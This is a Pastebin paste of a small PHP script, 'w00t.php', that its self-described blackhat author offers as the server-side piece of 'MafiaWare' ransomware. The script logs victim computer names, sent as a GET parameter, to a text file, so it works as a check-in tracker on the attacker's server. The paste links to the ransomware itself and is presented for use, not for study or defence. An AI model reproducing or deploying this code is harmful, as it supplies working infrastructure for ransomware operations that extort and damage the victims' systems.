Advertisement
cyberking

w00t.php (MafiaWare)

Mar 20th, 2017
4,493
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.37 KB | None | 0 0
  1. <?php
  2. /*
  3.  * Coded by : Cyberking
  4.  * This script for w00t.php on Mafiaware Ransomware (http://pastebin.com/0RWjbxxY)
  5.  * email me : cyberking@outlook.co.id
  6.  * Still Blackhat, Don't Trust Anyone !
  7.  */
  8.  
  9. $computerName = $_GET['g0ttrap'];
  10. $File = "w00t.txt";
  11. $fhandle = fopen($File, 'a');
  12.  
  13. fwrite($fhandle,"\n");
  14. fwrite($fhandle,$computerName);
  15. fclose($fhandle);
  16. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement